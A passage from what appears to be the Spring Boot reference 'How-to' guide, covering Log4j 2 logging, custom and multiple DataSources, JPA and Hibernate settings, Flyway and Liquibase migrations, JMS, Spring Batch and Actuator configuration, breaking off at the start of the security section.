Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The use of the Log4j starters gathers together the dependencies for common logging\nrequirements (e.g. including having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the Actuator Log4j 2 samples for more detail and to see it in\naction.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\n\n\n[[howto-configure-a-datasource]]\n=== Configure a custom DataSource\nTo configure your own `DataSource` define a `@Bean` of that type in your configuration.\nSpring Boot will reuse your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can easily bind your\n`DataSource` to the environment (see\n<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>).\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the url, the\nusername and the pool size, these settings will be bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> will also happen\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nYou can apply the same principle if you are configuring a custom JNDI `DataSource`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() throws Exception {\n\t\tJndiDataSourceLookup dataSourceLookup = new JndiDataSourceLookup();\n\t\treturn dataSourceLookup.getDataSource(\"java:comp\/env\/jdbc\/YourDS\");\n\t}\n----\n\nSpring Boot also provides a utility builder class `DataSourceBuilder` that can be used to\ncreate one of the standard data sources (if it is on the classpath). The builder can\ndetect the one to use based on what's available on the classpath. It also auto detects the\ndriver based on the JDBC url.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all that is needed really is the connection\ninformation; pool-specific settings can also be provided, check the implementation that\nis going to be used at runtime for more details.\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nThere is a catch however. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (The `DataSource` interface doesn't expose any property). Also, if\nyou happen to _only_ have Hikari on the classpath, this basic setup will not work because\nHikari has no `url` parameter (but a `jdbcUrl` parameter). You will have to rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You won't be able to change the implementation\nat runtime but the list of options will be explicit.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you, that is\nproviding a default embedded database if no url is provided with a sensible username and\npassword for it. You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` so you could just as well inject the one Spring Boot creates\nautomatically. However, that would split your configuration in two namespaces: url,\nusername, password, type and driver on `spring.datasource` and the rest on your custom\nnamespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in pair_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the same\nnamespace. Because `DataSourceProperties` is taking care of the `url`\/`jdbcUrl`\ntranslation for you, you can configure it like this:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nwill have no effect. In practice the builder will be initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee _<<spring-boot-features.adoc#boot-features-configure-datasource>>_ in the\n'`Spring Boot features`' section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\n`@Primary` as various auto-configurations down the road expect to be able to get one by\ntype.\n\nIf you create your own `DataSource`, the auto-configuration will back off. In the example\nbelow, we provide the _exact_ same features set than what the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `fooDataSourceProperties` has to be flagged `@Primary` so that the database\ninitializer feature uses your copy (should you use that).\n\nBoth data sources are also bound for advanced customizations. For instance you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.foo.type=com.zaxxer.hikari.HikariDataSource\n\tapp.datasource.foo.maximum-pool-size=30\n\n\tapp.datasource.bar.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.bar.username=dbuser\n\tapp.datasource.bar.password=dbpass\n\tapp.datasource.bar.max-total=30\n----\n\nOf course, you can apply the same concept to the secondary `DataSource` as well:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThis final example configures two data sources on custom namespaces with the same logic\nthan what Spring Boot would do in auto-configuration.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data repositories\nSpring Data can create implementations for you of `@Repository` interfaces of various\nflavors. Spring Boot will handle all of that for you as long as those `@Repositories`\nare included in the same package (or a sub-package) of your `@EnableAutoConfiguration`\nclass.\n\nFor many applications all you will need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb), create some repository interfaces to handle your\n`@Entity` objects. Examples are in the {github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample]\nor the {github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity definitions from Spring configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA properties\nSpring Data JPA already provides some vendor-independent configuration options (e.g.\nfor SQL logging) and Spring Boot exposes those, and a few more for hibernate as external\nconfiguration properties. Some of them are automatically detected according to the context\nso you shouldn't have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case in that it has different defaults\ndepending on whether you are using an embedded database (`create-drop`) or not (`none`).\nThe dialect to use is also automatically detected based on the current `DataSource` but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. Several databases have more than one `Dialect` and this may not suit your need.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate figure\nthings out or set the dialect using the `spring.jpa.database-platform` property.\n\nThe most common options to set are:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition all properties in `+spring.jpa.properties.*+` are passed through as normal JPA\nproperties (with the prefix stripped) when the local `EntityManagerFactory` is created.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nSpring Boot provides a consistent naming strategy regardless of the Hibernate generation\nthat you are using. If you are using Hibernate 4, you can customize it using\n`spring.jpa.hibernate.naming.strategy`; Hibernate 5 defines a `Physical` and `Implicit`\nnaming strategies.\n\nSpring Boot configures `SpringPhysicalNamingStrategy` by default. This implementation\nprovides the same table structure as Hibernate 4: all dots are replaced by underscores and\ncamel cases are replaced by underscores as well. By default, all table names are generated\nin lower case but it is possible to override that flag if your schema requires it.\n\nConcretely, a `TelephoneNumber` entity will be mapped to the `telephone_number` table.\n\nIf you'd rather use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager based on the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you will need to define a new one\nbecause otherwise the presence of the second bean of that type will switch off the\ndefault. To make it easy to do that you can use the convenient `EntityManagerBuilder`\nprovided by Spring Boot, or if you prefer you can just use the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM.\n\nExample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture you need to\nconfigure `TransactionManagers` for the two `EntityManagers` as well. One of them could\nbe picked up by the default `JpaTransactionManager` in Spring Boot if you mark it as\n`@Primary`. The other would have to be explicitly injected into a new instance. Or you\nmight be able to use a JTA transaction manager spanning both.\n\nIf you are using Spring Data, you need to configure `@EnableJpaRepositories` accordingly:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a traditional persistence.xml\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of type\n`LocalEntityManagerFactoryBean` (with id '`entityManagerFactory`', and set the persistence\nunit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo repositories\n\nSpring Data JPA and Spring Data Mongo can both create `Repository` implementations for you\nautomatically. If they are both present on the classpath, you might have to do some extra\nconfiguration to tell Spring Boot which one (or both) you want to create repositories for\nyou. The most explicit way to do that is to use the standard Spring Data\n`+@Enable*Repositories+` and tell it the location of your `Repository` interfaces\n(where '`*`' is '`Jpa`' or '`Mongo`' or both).\n\nThere are also flags `+spring.data.*.repositories.enabled+` that you can use to switch the\nauto-configured repositories on and off in external configuration. This is useful for\ninstance in case you want to switch off the Mongo repositories and still use the\nauto-configured `MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr). Just change the names of the annotations and flags\nrespectively.\n\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data repositories as REST endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you as\nlong as Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties from the `spring.data.rest` namespace that\ncustomize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you don't specify any order on your custom `RepositoryRestConfigurer` it will run\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a component that is used by JPA\nIf you want to configure a component that will be used by JPA then you need to ensure\nthat the component is initialized before JPA. Where the component is auto-configured\nSpring Boot will take care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that the latter has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you are using Hibernate Search with\nElasticsearch as its index manager then any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each, refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database initialization\nAn SQL database can be initialized in different ways depending on what your stack is. Or\nof course you can do it manually as long as the database is a separate process.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a database using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\n independent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\n behavior in a more fine-grained way. See below for more detail.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a database using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, `create-drop`. Spring Boot chooses a\ndefault value for you based on whether it thinks your database is embedded (default\n`create-drop`) or not (default `none`). An embedded database is detected by looking at the\n`Connection` type: `hsqldb`, `h2` and `derby` are embedded, the rest are not. Be careful\nwhen switching from in-memory to a '`real`' database that you don't make assumptions about\nthe existence of the tables and data in the new platform. You either have to set `ddl-auto`\nexplicitly, or use one of the other mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the <<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath will be executed on\nstartup if Hibernate creates the schema from scratch (that is if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful, but probably not something you want to be on the classpath in production. It\nis a Hibernate feature (nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts): it loads SQL from the standard root classpath locations\n`schema.sql` and `data.sql`, respectively. In addition Spring Boot will process the\n`schema-${platform}.sql` and `data-${platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to database\nspecific scripts if necessary, e.g. you might choose to set it to the vendor name of the\ndatabase (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql` etc.).\n\nSpring Boot enables the fail-fast feature of the Spring JDBC initializer by default, so if\nthe scripts cause exceptions the application will fail to start. You can tune that using\n`spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql` but not both. Make sure to disable `spring.jpa.hibernate.ddl-auto` if you\nchose the later.\n\nYou can also disable initialization by setting `spring.datasource.initialize` to `false`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch database\nIf you are using Spring Batch then it comes pre-packaged with SQL initialization scripts\nfor most popular database platforms. Spring Boot will detect your database type, and\nexecute those scripts by default, and in this case will switch the fail fast setting to\nfalse (errors are logged but do not prevent the application from starting). This is\nbecause the scripts are known to be reliable and generally do not contain bugs, so errors\nare ignorable, and ignoring them makes the scripts idempotent. You can switch off the\ninitialization explicitly using `spring.batch.initializer.enabled=false`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a higher-level database migration tool\nSpring Boot supports two higher-level migration tools: http:\/\/flywaydb.org\/[Flyway]\nand http:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway database migrations on startup\nTo automatically run Flyway database migrations on startup, add the\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, e.g. '`1`' or '`2_1`'). By default they live in a folder\n`classpath:db\/migration` but you can modify that using `flyway.locations`. You can also\nadd a special `{vendor}` placeholder to use vendor-specific scripts. Assume the following:\n\n[source,properties,indent=0]\n----\n\tflyway.locations=db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, this configuration will set the folder to use according\nto the type of the database (i.e. `db\/migration\/mysql` for MySQL). The list of supported\ndatabase are available in {sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\nSee also the Flyway class from flyway-core for details of available settings like schemas\netc. In addition Spring Boot provides a small set of properties in\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nthat can be used to disable the migrations, or switch off the location checking. Spring\nBoot will call `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nTIP: If you want to make use of http:\/\/flywaydb.org\/documentation\/callbacks.html[Flyway\ncallbacks], those scripts should also live in the `classpath:db\/migration` folder.\n\nBy default Flyway will autowire the (`@Primary`) `DataSource` in your context and\nuse that for migrations. If you like to use a different `DataSource` you can create\none and mark its `@Bean` as `@FlywayDataSource` - if you do that remember to create\nanother one and mark it as `@Primary` if you want two data sources.\nOr you can use Flyway's native `DataSource` by setting `flyway.[url,user,password]`\nin external properties.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nyou can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they will only be run when your\napplication starts for testing. If you want to be more sophisticated you can use\nprofile-specific configuration to customize `flyway.locations` so that certain migrations\nwill only run when a particular profile is active. For example, in\n`application-dev.properties` you could set `flyway.locations` to\n`classpath:\/db\/migration, classpath:\/dev\/db\/migration` and migrations in `dev\/db\/migration`\nwill only run when the `dev` profile is active.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase database migrations on startup\nTo automatically run Liquibase database migrations on startup, add the\n`org.liquibase:liquibase-core` to your classpath.\n\nThe master change log is by default read from `db\/changelog\/db.changelog-master.yaml` but\ncan be set using `liquibase.change-log`. In addition to YAML, Liquibase also supports\nJSON, XML, and SQL change log formats.\n\nBy default Liquibase will autowire the (`@Primary`) `DataSource` in your context and use\nthat for migrations. If you like to use a different `DataSource` you can create one and\nmark its `@Bean` as `@LiquibaseDataSource` - if you do that remember to create another one\nand mark it as `@Primary` if you want two data sources. Or you can use Liquibase's native\n`DataSource` by setting `liquibase.[url,user,password]` in external properties.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details of available settings like contexts, default schema etc.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase sample]\nso you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\n\n\n[[howto-jms-disable-transaction]]\n=== Disable transacted JMS session\nIf your JMS broker does not support transacted session, you will have to disable the\nsupport of transactions altogether. If you create your own `JmsListenerContainerFactory`\nthere is nothing to do since it won't be transacted by default. If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted session as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThis overrides the default factory and this should be applied to any other factory that\nyour application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch applications\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you'll need to implement `BatchConfigurer`, see\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch jobs on startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (comma-separated job name patterns).\n\nIf the application context includes a `JobRegistry` then the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\n\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP port or address of the actuator endpoints\nIn a standalone application the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port set the external property\n`management.port`. To listen on a completely different network address (e.g. if you have\nan internal network for management and an external one for user applications) you can\nalso set `management.address` to a valid IP address that the server is able to bind to.\n\nFor more detail look at the\n{sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n_<<production-ready-features.adoc#production-ready-customizing-management-server-port>>_\nin the '`Production-ready features`' section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' error page\nSpring Boot installs a '`whitelabel`' error page that you will see in browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off\nwhich will restore the default of the servlet container that you are using. Note that\nSpring Boot will still attempt to resolve the error view so you'd probably add you own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you are\nusing. For example, if you are using Thymeleaf you would add an `error.html` template and\nif you are using FreeMarker you would add an `error.ftl` template. In general what you\nneed is a `View` that resolves with a name of `error`, and\/or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration you should find\na `BeanNameViewResolver` in your `ApplicationContext` so a `@Bean` with id `error` would\nbe a simple way of doing that. Look at\n{sc-spring-boot-autoconfigure}\/web\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`] for more options.\n\nSee also the section on <<boot-features-error-handling, Error Handling>> for details of\nhow to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n=== Sanitize sensible values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive\nso keys matching a certain pattern are sanitized by default (i.e. their values are\nreplaced by `******`).\n\nSpring Boot uses sensible defaults for such keys: for instance, any key ending with the\nword \"password\", \"secret\", \"key\" or \"token\" is sanitized. It is also possible to use a\nregular expression instead, such as `*credentials.*` to sanitize any key that holds the\nword `credentials` as part of the key.\n\nThe patterns to use can be customized using the `endpoints.env.keys-to-sanitize` and\n`endpoints.configprops.keys-to-sanitize` respectively.\n\n\n\n[[howto-use-actuator-with-jersey]]\n=== Actuator and Jersey\nActuator HTTP endpoints are only available for Spring MVC-based applications. If you want\nto use Jersey and still use the actuator you will need to enable Spring MVC (by depending\non `spring-boot-starter-web`, for example). By default, both Jersey and the Spring MVC\ndispatcher servlet are mapped to the same path (`\/`). You will need to change the path for\none of them (by configuring `server.servlet-path` for Spring MVC or\n`spring.jersey.application-path` for Jersey). For example, if you add\n`server.servlet-path=\/system` into `application.properties`, the actuator HTTP endpoints\nwill be available under `\/system`.\n\n\n\n[[howto-security]]\n== Security\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot security configuration\nIf you define a `@Configuration` with `@EnableWebSecurity` anywhere in your application\nit will switch off the default webapp security settings in Spring Boot (but leave the\nActuator's security enabled). To tweak the defaults try setting properties in\n`+security.*+` (see\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\nfor details of available settings) and `SECURITY` section of\n<<common-application-properties-security,Common application properties>>.\n\n\n\n[[howto-change-the-authenticationmanager-and-add-user-accounts]]\n=== Change the AuthenticationManager and add user accounts\nIf you provide a `@Bean` of type `AuthenticationManager` the default one will not be\ncreated, so you have the full feature set of Spring Security available (e.g.\nhttp:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various authentication options]).\n\nSpring Security also provides a convenient `AuthenticationManagerBuilder` which can be\nused to build an `AuthenticationManager` with common options. The recommended way to\nuse this in a webapp 